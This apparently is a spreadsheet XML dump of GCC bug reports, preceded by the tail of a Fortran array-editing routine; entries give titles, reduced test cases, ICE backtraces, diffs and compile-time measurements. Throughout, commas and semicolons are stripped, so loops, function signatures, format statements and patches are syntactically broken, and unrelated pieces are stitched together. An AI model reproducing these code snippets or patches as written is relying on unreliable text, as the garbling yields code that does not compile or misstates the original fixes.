         lseq   = in(i)
  430    do 450 lsq=1lseq
            do 440 ii=1l
               j2     = j1 + j
               j4     = j2 - l*inc
               d(j2)  = d(j4)
               if (ldbl.eq.1) d(j2+1) = d(j4+1)
  440          j      = j+inc
  450       continue
         go to 600
c   *** inverted sequence repeat (n)
  460    l      = v(i) + in(i)
         lseq   = 1
         if (v(i).eq.0.0.or.in(i).eq.0) go to 470
         l      = v(i)
         lseq   = in(i)
  470    do 490 lsq=1lseq
            do 480 ii=1l
               j2     = j1 + j
               j4     = j2 - 2*ii*inc + inc
c   *** reversed sign inverted sequence repeat (m)
               if (ldbl.eq.1)  then
                 vi(1) = d(j4)
                 vi(2) = d(j4+1)
               else
                 vv     = d(j4)
               end if
               if (k(i).eq.lm)     vv = -vv
               if (ldbl.eq.1) then
                 d(j2)   = vi(1)
                 d(j2+1) = vi(2)
               else
                 d(j2)  = vv
               end if
  480          j      = j+inc
  490       continue
         go to 600
c   *** logarithmic interpolation (l)
  500    l      = in(i) + 1
         vv     = v(i)
         iii    = 2
         go to 600
  510    vu     = v(i)/vv
changed by st 96/12/18 for lahey fortran
c        del    = dexp(dlog(vu)/dfloat(l))
         del    = dexp(dlog(vu)/dble(l))
         j2     = j1 + j
         if (ldbl.eq.1) then
           d(j2)   = vi(1)
           d(j2+1) = vi(2)
         else
           d(j2)   = vv
         end if
         j      = j+inc
         do 520 ii=2l
            j2     = j1 + j
            vv     = del*vv
            if (ldbl.eq.1) then
              d(j2)   = vi(1)
              d(j2+1) = vi(2)
            else
              d(j2)  = vv
            end if
  520       j      = j+inc
         if (iii.ne.0) go to 140
         go to 600
c   *** fixed 10 log interp.  (k)
  530    l      = in(i) + 1
         vv     = v(i)
         iii    = 3
         go to 600
  540    dif    = (v(i)-vv)/9.0d0
changed by st 96/12/18 for lahey fortran
c        del    = dexp(2.302585092994045d0/dfloat(l))
         del    = dexp(2.302585092994045d0/dble(l))
         j2     = j1 + j
         if (ldbl.eq.1) then
           d(j2)   = vi(1)
           d(j2+1) = vi(2)
         else
           d(j2)   = vv
         end if
         vv     = vv-dif
         j      = j+inc
         do 550 ii=2l
            j2     = j1 + j
            dif    = dif*del
            delt   = vv + dif
            if (ldbl.eq.1) then
              d(j2)   = dv(1)
              d(j2+1) = dv(2)
            else
              d(j2)   = delt
            end if
  550       j      = j+inc
         if (iii.ne.0) go to 140
         go to 600
c   *** interpolate (i)
  560    l      = in(i) + 1
         vv     = v(i)
         iii    = 1
         go to 600
  570    del    = (v(i)-vv)/float(l)
         do 580 ii=1l
            j2     = j1 + j
            delt   = del*float(ii-1) + vv
            if (ldbl.eq.1) then
              d(j2)   = dv(1)
              d(j2+1) = dv(2)
            else
              d(j2)   = delt
            end if
            if (kk.ne.0)  ld(j2) = delt + sign(0.5d0del)
  580       j      = j+inc
         if (iii.ne.0) go to 140
         go to 600
c   *** read alphanumeric
  590    ll     = in(i)
         ll3    = ll+ll2-1
         j2     = 1
         j      = 0
         ncount = 0
         mode   = 0
         if (v(i).eq.0) mode   = 1
         lstart = v(mode+i)
         lstop  = v(mode+i+1)
         lstar  = lld(ll3) + lstart - 1
         lsto   = lld(ll3) + lstop - 1
         read(n510900) (d(ii)ii=lstarlsto)
         write(n610300)lllstartlstop
         i      = mode+i+1
  600    continue
         i      = i+1
         if ( i.le.nf ) go to 130
      go to 100
c   *** format statements
10000 format(6(i2a1f9.0)t52a45(4x2a4))
10100 format(' 't532a4i7a1)
10200 format(t90i5a1' array'i7' entries read at'i4a1)
10300 format('0'i5'/ array read from'i5' to'i5)
10400 format(1h0i5a1' array'i7' entries read')
10500 format('0****** error 'i7' entries required in 'i3a1' array'/
     *  '0 data edit continues' )
10600 format(1h0i5a1)
10700 format('0****** fill option ignored in 'i2a1' array' )
10800 format('0****** warning  address'i7' is beyond limits of'i3a1
     *  ' array')
10900 format(18a4)
      end
C</t>
  </si>
  <si>
    <t>icgomes</t>
  </si>
  <si>
    <t>GCC-5311</t>
  </si>
  <si>
    <t>[IA64] verify_flow_info: Duplicate edge</t>
  </si>
  <si>
    <t>ICE in verify_flow_info.
Release:
3.1 20020107 (experimental)
Environment:
System: Linux gadolinium 2.4.7-SMP #1 SMP Fri Nov 23 12:13:10 GMT 2001 ia64 unknown
Architecture: ia64
host: ia64-suse-linux-gnu
build: ia64-suse-linux-gnu
target: ia64-suse-linux-gnu
configured with: ../configure --enable-threads=posix --enable-long-long --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --enable-languages=cc++f77objcjavaada --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared ia64-suse-linux
How-To-Repeat:
$ gcc -O -S btr0btr.i
btr0btr.i: In function `btr_page_get_sure_split_rec':
btr0btr.i:214: verify_flow_info: Duplicate edge 18-&gt;19
btr0btr.i:214: confused by earlier errors bailing out</t>
  </si>
  <si>
    <t>GCC-907</t>
  </si>
  <si>
    <t>__attribute__((stdcall))  does not affect C++ Methods rendering __attribute__(com_interface) nonsensical.</t>
  </si>
  <si>
    <t>Trying to implement COM-compatible interfaces with mingw32 2.95.2. The declaration __attribute__(com_interface) works correctly laying out the vtable in correct form however COM uses pascal-style calls (arguments pushed left-to-right callee pops return address). When making COM calls functions need to be declared __stdcall in the Win32 environment which expands to __attribute__(__stdcall__). GCC accepts the declaration but compiles the code to use C calling convention instead.
e.g:
Compile Options: -fvtable-thunks 
Source:
#include 
DECLARE_INTERFACE_(AIUnknown)  {
public:
	HRESULT __attribute__((stdcall)) QueryInterface(const IID&amp; void **) { 
            return E_FAIL         }
	ULONG __attribute__((stdcall)) AddRef() { return 0 }
	ULONG __attribute__((stdcall)) Release() { return 0 }
}
Test:
A::AddRef assembler output should return with 
ret 4 not ret.
Release:
MINGW 2.95.2
Environment:
Win32</t>
  </si>
  <si>
    <t>ira</t>
  </si>
  <si>
    <t>rerdavies</t>
  </si>
  <si>
    <t>GCC-32790</t>
  </si>
  <si>
    <t>REG_N_SETS holds wrong value</t>
  </si>
  <si>
    <t>In ./gcc/regclass.c:reg_scan_mark_refs()
there is this source code:
    case SET:
      /* Count a set of the destination if it is a register.  */
      for (dest = SET_DEST (x)
	   GET_CODE (dest) == SUBREG || GET_CODE (dest) == STRICT_LOW_PART
	   || GET_CODE (dest) == ZERO_EXTEND
	   dest = XEXP (dest 0))
This code counts the number of times a REG is changed (eventually used in combine reload regrenumber ...)
IMHO the ZERO_EXTEND is a typo and should be a ZERO_EXTRACT because (set (zero_extract (reg foo bar)) are RTX that are actually generated in some define_insn/define_expand insv (provided HAVE_insv) if the source deals with bitfields.
As this code can already be seen in GCC 3.3.* I guess this is not very critical. But it leads to problems in a non-standard target (tricore) that uses the information in REG_N_SETS().
Greets
Georg-Johann Lay
georg.lay@hightec-rt.com</t>
  </si>
  <si>
    <t>georgjohann</t>
  </si>
  <si>
    <t>GCC-11433</t>
  </si>
  <si>
    <t>libobjc</t>
  </si>
  <si>
    <t>Crash due to dereferencing null pointer when querying protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Consider the following trivial test program (test.m)-
#include        
#include        
#include        
@protocol TestProtocol
+ testMethod
@end
int
main()
{
  [@protocol(TestProtocol) descriptionForInstanceMethod: @selector(name)]
  return 0
}
If you compile it using the command 'gcc test.m -lobjc'
Then run a.out and you will get a segmentation violation.
This is because TestProtocol contains only a class method but we tried to look
up an instance method ... the lookup should have returned a null pointer rather
than crashing.
There is a simple fix to the file Protocol.m in the objc runtume ...
diff Protocol.m Protocol.m.old
83c83
&lt;   if (instance_methods != 0)
---
&gt;   for (i = 0 i count i++)
8589c8586
count i++)
&lt;       {
list[i].name name))
&lt;           return 
&lt;       }
---
&gt;       if (!strcmp ((char*)instance_methods-&gt;list[i].name name))
&gt;       return 
113c110
&lt;   if (class_methods != 0)
---
&gt;   for (i = 0 i count i++)
115119c112113
count i++)
&lt;       {
list[i].name name))
&lt;           return 
&lt;       }
---
&gt;       if (!strcmp ((char*)class_methods-&gt;list[i].name name))
&gt;       return </t>
  </si>
  <si>
    <t>zackw</t>
  </si>
  <si>
    <t>GCC-1718</t>
  </si>
  <si>
    <t>ArithmeticException regressions</t>
  </si>
  <si>
    <t>1) This test case does not run correctly:
public class ArithExTest {
    public static void main(String[] args) 
    {
      try
        {
          int k = 3 / 0
        }
      catch (Exception x)
        {
          System.out.println (ok)
        }
    }
}
The exception gets thrown all the way back to the default
handler missing the hander defined in the test case.
2) The testsuite case libjava.lang/Divide_1.java loops 
indefinatly. I can see the SIGFPE in gdb but execution seems
to resume at a point before the instructions that generated
the exception.
NullPointerExceptions seem to be working fine though.
Release:
current CVS
Environment:
Red Hat 7.0 w/ kernel 2.4.0 glibc-2.2-12</t>
  </si>
  <si>
    <t>GCC-23875</t>
  </si>
  <si>
    <t>operator&lt;&lt;(short) should not call operator&lt;&lt;(long) etc.</t>
  </si>
  <si>
    <t>DR117 is not implemented in the same way of DR118: operator&lt;&lt;(short) calls
operator&lt;&lt;(long) operator&lt;&lt;(unsigned short) calls operator&lt;&lt;(unsigned long) 
operator&lt;&lt;(int) calls operator&lt;&lt;(long) etc... I think the way we implemented
DR118 is better (i.e. following the letter of the resolution without calling
other inserters/extractors) even if it adds more code for now (*) because
allows the user to specialize say only operator&lt;&lt;(long) without affecting
the other inserters.
(*) Then another project would clean-up and commonize the code in those bodies
to say _M_insert and _M_extract.</t>
  </si>
  <si>
    <t>GCC-26804</t>
  </si>
  <si>
    <t>Alias Time explosion</t>
  </si>
  <si>
    <t>Alias analysis is taking a long time now.
I seem to  have narrowed it down to this patch:
http://gcc.gnu.org/ml/gcc-patches/2006-01/msg00908.html
running cpgram.ii shows a regression:
before patch:
 tree alias analysis   :   2.49 ( 7%) usr   0.25 ( 5%) sys   6.13 ( 5%) wall    4971 kB ( 1%) ggc
 TOTAL                 :  36.90             4.72           130.34             467341 kB
after patch:
 tree alias analysis   :  59.00 (63%) usr   0.40 ( 7%) sys  70.43 (36%) wall    4957 kB ( 1%) ggc
 TOTAL                 :  94.13             5.43           193.85             468339 kB
on a 386 linux machine bootstrapped with checking disabled.
cpgram.ii needs to be compiled with -fpermissive -O2</t>
  </si>
  <si>
    <t>amacleod</t>
  </si>
  <si>
    <t>GCC-69242</t>
  </si>
  <si>
    <t>[6 Regression] ICE in visit_reference_op_load at tree-ssa-sccvn.c:3224</t>
  </si>
  <si>
    <t>trunk r232188 works with -O0 fails on 32bit targets works on 64bit targets
reduced test case:
int a[1]
void *memcpy()
int smx_ctx_base_factory_create_context_sized()
void getcontext()
void smx_ctx_sysv_create_context() {
  int *b = (int *)smx_ctx_base_factory_create_context_sized()
  getcontext()
  memcpy(a 
  switch (a[0])
}
$ gcc -c -O1 smx_context_sysv.i
smx_context_sysv.i: In function 'smx_ctx_sysv_create_context':
smx_context_sysv.i:11:1: internal compiler error: in visit_reference_op_load at tree-ssa-sccvn.c:3224
 }
 ^
0x870a563 visit_reference_op_load
        ../../src/gcc/tree-ssa-sccvn.c:3224
0x870a563 visit_use
        ../../src/gcc/tree-ssa-sccvn.c:3581
0x870c246 process_scc
        ../../src/gcc/tree-ssa-sccvn.c:3801
0x870c246 extract_and_process_scc_for_name
        ../../src/gcc/tree-ssa-sccvn.c:3888
0x870c246 DFS
        ../../src/gcc/tree-ssa-sccvn.c:3940
0x870c962 sccvn_dom_walker::before_dom_children(basic_block_def*)
        ../../src/gcc/tree-ssa-sccvn.c:4395
0x8b4a6f9 dom_walker::walk(basic_block_def*)
        ../../src/gcc/domwalk.c:265
0x870d247 run_scc_vn(vn_lookup_kind)
        ../../src/gcc/tree-ssa-sccvn.c:4506
0x86e6f6c execute
        ../../src/gcc/tree-ssa-pre.c:4895
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-10086</t>
  </si>
  <si>
    <t>static const int unresolved in ? : construct</t>
  </si>
  <si>
    <t>const static int variables show up as unresolved in the linker.
Release:
gcc version 3.2 20020927 (prerelease)
Environment:
Cygwin
How-To-Repeat:
g++ bug.cpp</t>
  </si>
  <si>
    <t>chrisk</t>
  </si>
  <si>
    <t>GCC-69268</t>
  </si>
  <si>
    <t>[5 Regression] Sourced allocation calls function twice</t>
  </si>
  <si>
    <t>Created attachment 37338
Source code of program reproducing the problem
The attached program demonstrates that in a sourced allocation based on a function call the function is called twice. Example output:
 called:           1
 called:           2
I believe this may gave been fixed in 6.0 but 5.3 seems to still have the problem.</t>
  </si>
  <si>
    <t>townsend</t>
  </si>
  <si>
    <t>GCC-41593</t>
  </si>
  <si>
    <t>slightly confusing configure message about lto</t>
  </si>
  <si>
    <t>../trunk/configure --enable-languages=clto --enable-__cxa_atexit --disable-nls --enable-threads=posix --with-mpfr=/opt/cfarm/mpfr-2.4.1/ --with-gmp=/opt/cfarm/gmp-4.2.4/  --prefix=/n/16/guerby/install-trunk --with-libelf=/opt/cfarm/libelf-0.8.12
...
checking for the correct version of libelf... yes
The following languages will be built: cltolto
=&gt; Note the duplicate lto.</t>
  </si>
  <si>
    <t>GCC-56729</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in df_insn_delete</t>
  </si>
  <si>
    <t>/tmp/20130325/gcc/xgcc -B/tmp/20130325/gcc/ /nasfarm/dje/src/src/gcc/testsuite/c-c++-common/torture/vshuf-v2di.c  -fno-diagnostics-show-caret -O1 -S  -o vshuf-v2di.s
In file included from /nasfarm/dje/src/src/gcc/testsuite/c-c++-common/torture/vshuf-v2di.c:15:0:
/nasfarm/dje/src/src/gcc/testsuite/c-c++-common/torture/vshuf-main.inc: In function 'main':
/nasfarm/dje/src/src/gcc/testsuite/c-c++-common/torture/vshuf-main.inc:26:1: internal compiler error: in df_insn_delete at df-scan.c:1162</t>
  </si>
  <si>
    <t>GCC-23955</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] Compile time regressions with tramp3d</t>
  </si>
  <si>
    <t>The tramp3d-v4.cpp testcase (attached to PR23928) shows regressions in compile
time.  For a first comparison consider compilation with leafify disabled and
 -fno-exceptions -O2 -march=pentium4 -ffast-math -fpeel-loops
compile flags.  All results with checking-disable and profile-bootstrapped
compilers from the HEAD of their branches.  Run-time for 10 iterations is
included as a reference too.
         compile   run
gcc-3.4  1m02s     25.9s
gcc-4.0  1m43s     15.2s
gcc-4.1  2m50s      8.8s
The following measurements are with leafification enabled (patched
3.4 and 4.0 -Dleafify=flatten for 4.1):
gcc-3.4  1m20s     10.5s
gcc-4.0  2m18s      8.6s
gcc-4.1  3m2s       8.5s
gcc-4.1+ 3m8s       6.5s
gcc-4.1+ is with the tree-forwprop and array-aliasing patches.
We see that even the fair comparison (same inlining via the
leafify patch) regresses considerably from 3.4 to 4.0 and 4.1.
Given the non-existant run-time improvement from 4.0 to 4.1
the regression there is even more disappointing.
Just for the complete report here are some -O0 -fno-exception
numbers (w/o leafify):
3.4  22.3s
4.0  15.8s
4.1  16.8s</t>
  </si>
  <si>
    <t>GCC-10764</t>
  </si>
  <si>
    <t>[3.4 regression] ICE when using log() -fast-math and optimization</t>
  </si>
  <si>
    <t xml:space="preserve">From: Dara Hazeghi 
To: phil_e@wanadoo.fr gcc-gnats@gcc.gnu.org
Cc:  
Subject: Re: optimization/10764: ICE when using log() -fast-math and optimization
Date: Mon 12 May 2003 22:16:46 -0700
 http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit- 
 trail&amp;database=gcc&amp;pr=10764
 Hello
 I can't repeat this bug on gcc 3.4 20030512. That means something in  
 the last day or two must've broken it. I suggest updating your compiler  
 (to latest cvs) and checking (might've been a broken cvs checkin). If  
 that doesn't work you might want to try checking gcc-patches for  
 anything relevant.
 Dara
</t>
  </si>
  <si>
    <t>sayle</t>
  </si>
  <si>
    <t>phil_e</t>
  </si>
  <si>
    <t>GCC-21459</t>
  </si>
  <si>
    <t>strings of different length in a single character(len=*) declaration</t>
  </si>
  <si>
    <t>Consider the following test code
program format_string
  implicit none
  character(len=*) parameter :: rform='(F15.5)' &amp;
  cform=(' (' F15.5 '' F15.5 ') ')
  call print_a_number(cform)
contains
subroutine print_a_number(style)
  character(len=*) :: style
  write(* style) cmplx(0.0 0.0)
end subroutine print_a_number
end program format_string
This program compiles fine. But gives a runtime error.
$gfortran-20050507-1 -v
Using built-in specs.
Target: i486-linux
Configured with: ../src/configure -v
--enable-languages=cc++javaf95objcadatreelang
--prefix=/usr/lib/gcc-snapshot --enable-shared --with-system-zlib --disable-nls
--program-suffix=-20050507-1 --enable-__cxa_atexit
--enable-libstdcxx-allocator=mt --enable-clocale=gnu --enable-libstdcxx-debug
--enable-java-gc=boehm --enable-java-awt=gtk --enable-mpfr --disable-werror
--disable-werror i486-linux
Thread model: posix
gcc version 4.1.0 20050507 (experimental)
$gfortran format_string.f90 -o format_string
$./a.out
At line 10 of file format_string.f90
Fortran runtime error: Unexpected end of format string
(' ('
      ^
I am using Debian Sid distribution gcc-snapshot 20050507-1 package.
The above program compiles and runs fine with Absoft Fortran 90/95 compiler and
with intel fortran compiler 8.1 Build 20040921. The interaction with Absoft
compiler looks as follows
$f90 format_string.f90
rajulocal@kusumanchi:~/work/fortran/gfortran_bugs 28  527 11:21 PM
$./a.out
 (        0.00000        0.00000)</t>
  </si>
  <si>
    <t>kamaraju</t>
  </si>
  <si>
    <t>GCC-52089</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/simulate-thread/subfields.c  -O3 -g  thread simulation test</t>
  </si>
  <si>
    <t>spawn gdb -nx -nw -x /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/simulate-thread
/simulate-thread.gdb ./subfields.exe
GNU gdb (GDB) 7.3-debian
Copyright (C) 2011 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as hppa-linux-gnu.
For bug reporting instructions please see:
...
Reading symbols from /home/dave/gnu/gcc/objdir/gcc/testsuite/gcc/subfields.exe..
.done.
Breakpoint 1 at 0x1090c: file /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/simula
te-thread/subfields.c line 84.
Breakpoint 1 simulate_thread_main () at /home/dave/gnu/gcc/gcc/gcc/testsuite/gc
c.dg/simulate-thread/subfields.c:84
84      {
1: x/i $pc
=&gt; 0x1090c :      stw rp-14(sp)
85        set_a(1)
1: x/i $pc
=&gt; 0x10910 :    ldi 1r26
86      }
1: x/i $pc
=&gt; 0x10914 :    ldw -14(sp)rp
85        set_a(1)
1: x/i $pc
=&gt; 0x10918 :   bl 0x10784 r0
0x0001091c      85        set_a(1)
1: x/i $pc
=&gt; 0x1091c :   nop
0x00010920      85        set_a(1)
1: x/i $pc
=&gt; 0x10920 :   nop
$$dyncall () at ../../../gcc/libgcc/config/pa/milli64.S:219
219             bb&gt;=n %r2230LREF(1)          branch if not plabel address
1: x/i $pc
=&gt; 0x10924 : bb*&gt;=n r221e0x10934 
219             bb&gt;=n %r2230LREF(1)          branch if not plabel address
1: x/i $pc
=&gt; 0x10924 : bb*&gt;=n r221e0x10934 
FAIL: Unexpected value. var.b is 7 should be 0
FAIL: Unexpected value. var.c is 7 should be 0
FAIL: Unexpected value. var.d is 7 should be 0
Breakpoint 1 simulate_thread_main () at /home/dave/gnu/gcc/gcc/gcc/testsuite/gcc.dg/simulate-thread/subfields.c:84
84      {
1: x/i $pc
=&gt; 0x1090c :      stw rp-14(sp)
A debugging session is active.
        Inferior 1 [process 1024] will be killed.
Quit anyway? (y or n) [answered Y input not from terminal]
FAIL: gcc.dg/simulate-thread/subfields.c  -O3 -g  thread simulation test</t>
  </si>
  <si>
    <t>GCC-50432</t>
  </si>
  <si>
    <t>lto1.exe: internal compiler error: in cgraph_mark_functions_to_output at cgraphunit.c:1173 when build Qt4.7.4 rcc</t>
  </si>
  <si>
    <t>If I use gcc4.6.1 to build Qt4.7.4 with -flto -fuse-linker-plugin it will result in an internal compiler error when building rcc:
g++ -Wl-s -flto -fuse-linker-plugin -Wl-subsystemconsole -o ../../../bin/rcc.exe tmp/obj/release_shared/rcc.o  tmp/obj/release_shared/main.o  -L'e:/new/GUI/Qt/qt-everywhere-opensource-src-4.7.4/src/tools/bootstrap/release' -lbootstrap -luser32 
lto1.exe: internal compiler error: in cgraph_mark_functions_to_output at cgraphunit.c:1173
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: g++ returned 1 exit status
e:/mypack/mingw/bin/../lib/gcc/i686-w64-mingw32/4.6.2/../../../../i686-w64-mingw32/bin/ld.exe: lto-wrapper failed
collect2: ld returned 1 exit status
Makefile.Release:75: recipe for target `../../../bin/rcc.exe' failed
mingw32-make[2]: *** [../../../bin/rcc.exe] Error 1
mingw32-make[2]: Leaving directory `E:/new/GUI/Qt/qt-everywhere-opensource-src-4.7.4/src/tools/rcc'
Makefile:34: recipe for target `release' failed
mingw32-make[1]: *** [release] Error 2
mingw32-make[1]: Leaving directory `E:/new/GUI/Qt/qt-everywhere-opensource-src-4.7.4/src/tools/rcc'
makefile:133: recipe for target `sub-rcc-make_default-ordered' failed
mingw32-make: *** [sub-rcc-make_default-ordered] Error 2</t>
  </si>
  <si>
    <t>xunxun1982</t>
  </si>
  <si>
    <t>GCC-80448</t>
  </si>
  <si>
    <t>#include  fails with Clang 5.0</t>
  </si>
  <si>
    <t xml:space="preserve">Simply including  fails to compile when using Clang. The first error in the stack is:
/opt/gcc-tot/lib/gcc/x86_64-pc-linux-gnu/7.0.1/../../../../include/c++/7.0.1/experimental/bits/fs_dir.h:265:5: error: default member initializer for '_M_options' needed within definition of enclosing
      class 'recursive_directory_iterator' outside of member functions
    recursive_directory_iterator() noexcept = default
The complete reproducer is:
// clang++ -std=c++1z -fsyntax-only --gcc-toolchain=/opt/gcc-tot test.cpp
// test.cpp
#include </t>
  </si>
  <si>
    <t>GCC-50522</t>
  </si>
  <si>
    <t>C++ std::valarray vectorization missed optimization</t>
  </si>
  <si>
    <t>#include 
std::valarray
f1 (std::valarray a std::valarray b std::valarray c int z)
{
  int i
  for (i = 0 i &lt; z i++)
    {
      a[i] = b[i] + c[i]
      a[i] += b[i] * c[i]
    }
  return a
}
void
f2 (std::valarray &amp;__restrict a std::valarray &amp;__restrict b std::valarray &amp;__restrict c int z)
{
  int i
  for (i = 0 i &lt; z i++)
    {
      a[i] = b[i] + c[i]
      a[i] += b[i] * c[i]
    }
}
should be vectorizable (f2 only since http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=179166 ) but it is not.
There seems to be 2 problems:
1) from the inlines we unfortunately have pointers (resp. references) initialized from TYPE_RESTRICT pointers which don't have TYPE_RESTRICT themselves.
--- tree-ssa-alias.c.jj 2011-09-15 12:18:37.000000000 +0200
+++ tree-ssa-alias.c 2011-09-26 09:10:50.000000000 +0200
@@ -2237 +2236 @@ ptr_deref_may_alias_decl_p (tree ptr tr
      pointer and that pointers points-to set doesn't contain this decl
      then they can't alias.  */
   if (DECL_RESTRICTED_P (decl)
-      &amp;&amp; TYPE_RESTRICT (TREE_TYPE (ptr))
       &amp;&amp; pi-&gt;pt.vars_contains_restrict)
     return bitmap_bit_p (pi-&gt;pt.vars DECL_PT_UID (decl))
@@ -3198 +3188 @@ ptr_derefs_may_alias_p (tree ptr1 tree 
   /* If both pointers are restrict-qualified try to disambiguate
      with restrict information.  */
-  if (TYPE_RESTRICT (TREE_TYPE (ptr1))
-      &amp;&amp; TYPE_RESTRICT (TREE_TYPE (ptr2))
+  if (pi1-&gt;pt.vars_contains_restrict
+      &amp;&amp; pi2-&gt;pt.vars_contains_restrict
       &amp;&amp; !pt_solutions_same_restrict_base (&amp;pi1-&gt;pt &amp;pi2-&gt;pt))
     return false
seems to fix that part but maybe it is too unsafe (would e.g. vars_contains_restrict propagate through cast of a pointer to integer and back?).  Maybe just a quick hack of allowing either TYPE_RESTRICT or POINTER_TYPE_P SSA_NAME initialized from either a pointer cast or POINTER_PLUS_EXPR from a TYPE_RESTRICT pointer would be enough to fix this and don't regress problematic __restrict cases (richi which are the currently known ones?).
2) even with that change the vectorizer didn't vectorize this.  But apparently this turned out to be something Eric fixed over the weekend - r179165 - where simple_iv checked just for POINTER_TYPE and not for POINTER_TYPE_P.</t>
  </si>
  <si>
    <t>GCC-62695</t>
  </si>
  <si>
    <t>[5.0 Regression] internal compiler error: in get_constraint_for_component_ref at tree-ssa-structalias.c:3189</t>
  </si>
  <si>
    <t>A recent trunk regression between good: r214776 and bad r214808 suspect r214795
&gt; gfortran  -c -fipa-pta -O1  bug.f90
bug.f90:23:0: 
   END SUBROUTINE dbcsr_mp_make_env
 ^
internal compiler error: in get_constraint_for_component_ref at tree-ssa-structalias.c:3189
0xc537eb get_constraint_for_component_ref
	../../gcc/gcc/tree-ssa-structalias.c:3189
0xc537eb get_constraint_for_1
	../../gcc/gcc/tree-ssa-structalias.c:3454
0xc547f2 get_constraint_for_address_of
	../../gcc/gcc/tree-ssa-structalias.c:3325
0xc5330f get_constraint_for_1
	../../gcc/gcc/tree-ssa-structalias.c:3393
0xc547f2 get_constraint_for_address_of
	../../gcc/gcc/tree-ssa-structalias.c:3325
0xc59d09 find_func_clobbers
	../../gcc/gcc/tree-ssa-structalias.c:5042
0xc59d09 ipa_pta_execute
	../../gcc/gcc/tree-ssa-structalias.c:7180
&gt; cat bug.f90
MODULE dbcsr_dist_operations
  TYPE dbcsr_mp_obj
  END TYPE dbcsr_mp_obj
  INTERFACE
    SUBROUTINE dbcsr_mp_new(mp_env pgrid mp_group mynode numnodes myprow&amp;
         mypcol)
      IMPORT
      TYPE(dbcsr_mp_obj) INTENT(OUT)          :: mp_env
      INTEGER DIMENSION(0: 0:) INTENT(IN)   :: pgrid
    END SUBROUTINE dbcsr_mp_new
  END INTERFACE
CONTAINS
  SUBROUTINE dbcsr_mp_make_env (mp_env mp_group &amp;
       nprocs pgrid_dims error)
    TYPE(dbcsr_mp_obj) INTENT(OUT)          :: mp_env
      OPTIONAL                               :: pgrid_dims
    INTEGER                                  :: error_handle group mynode &amp;
                                                numnodes pcol prow
    INTEGER ALLOCATABLE DIMENSION(: :)    :: pgrid
    INTEGER DIMENSION(2)                    :: coord myploc npdims
    CALL dbcsr_mp_new (mp_env pgrid group mynode numnodes&amp;
         myprow=myploc(1) mypcol=myploc(2))
  END SUBROUTINE dbcsr_mp_make_env
END MODULE dbcsr_dist_operations</t>
  </si>
  <si>
    <t>GCC-50971</t>
  </si>
  <si>
    <t>Only one loop detected when there should be two</t>
  </si>
  <si>
    <t>Take:
typedef struct basket
{
    int *a
    int cost
    int abs_cost
} BASKET
BASKET *perm[50 +300 +1]
int f(int a int *b int cut)
{
  do {
  while (perm[a]-&gt;abs_cost &gt; cut)
    a++
  a++
  } while (b[a])
  return a
}
--- CUT ---
Currently cfgloop finds only one loop as both loops start at the same basic block.
This causes Loop Copy header not do its job and copy the while's loop's header.  Note the code could be rewritten like to get the same effect:
int f1(int a int *b int cut)
{
  do {
  if (perm[a]-&gt;abs_cost &gt; cut)
    {
      a++
      continue
    }
  a++
  } while (b[a])
  return a
}
--- CUT ---
Note fixing this might help MCF in SPEC 2006.</t>
  </si>
  <si>
    <t>GCC-84067</t>
  </si>
  <si>
    <t>[8 regression] gcc.dg/wmul-1.c regression on aarch64 after r257077</t>
  </si>
  <si>
    <t>After r257077 I have noticed a regression on aarch64:
FAIL: gcc.dg/wmul-1.c scan-tree-dump-not widening_mul WIDEN_MULT_PLUS_EXPR
Richi said:
Late forwprop does
@@ -757 +217 @@
   _1 = (long unsigned int) Idx_6(D)
   _2 = _1 * 40
   _12 = _1 * 4
-  _17 = _2 + _12
+  _17 = _1 * 44
   _13 = Arr_7(D) + _17
   MEM[(int[10] *)_13] = 1
   _4 = _2 + 400
  _18 = _4 + _12
  _16 = Arr_7(D) + _18
  MEM[(int[10] *)_16] = 2
which I'm not sure ends up profitable at the end.  It makes _12
dead so the total number of multiplications stays the same.
For this we then apply the WIDEN_MULT_PLUS_EXPR two
times given _2 is no longer used multiple times.
The reason the above transform happens is the match.pd :s
behavior which ignores :s in case the resulting expression
is simple.</t>
  </si>
  <si>
    <t>GCC-80280</t>
  </si>
  <si>
    <t>Missing closing quote (%&gt;) c/semantics.c and c/c-typeck.c</t>
  </si>
  <si>
    <t>The following four messages lack a closing quote (%&gt;) somewhere after the %&lt;#pragma...
In c/semantics.c:8523
      error (%&lt;#pragma omp cancel must specify one of 
             % % % or % clauses)
In c/semantics.c:8560
      error (%&lt;#pragma omp cancellation point must specify one of 
             % % % or % clauses)
In c/c-typeck.c:11867
      error_at (loc %&lt;#pragma omp cancel must specify one of 
                     % % % or % 
                     clauses)
In c/c-typeck.c:11906
      error_at (loc %&lt;#pragma omp cancellation point must specify one of 
                     % % % or % 
                     clauses)</t>
  </si>
  <si>
    <t>fmarchal</t>
  </si>
  <si>
    <t>GCC-8913</t>
  </si>
  <si>
    <t>[3.3 regression] ICE in simplify_gen_subreg at simplify-rtx.c</t>
  </si>
  <si>
    <t>This is an error in the c++ compiler when compiling with optimization turned on.
Internal compiler error when using template class as constructor arg. Program: see ho-to-repeat.
If no destructor is given or no optimization is used program compiles.
This bug is not in my version of gcc-3.1 so it arrived somewhere since then.
$ gcc -v
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-threads --enable-languages=cc++objective-c : (reconfigured) ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-threads --enable-languages=cc++objc
Thread model: posix
gcc version 3.3 20021206 (experimental)
$ g++ -c -O compiler-3.3-20021206-failure.cc 
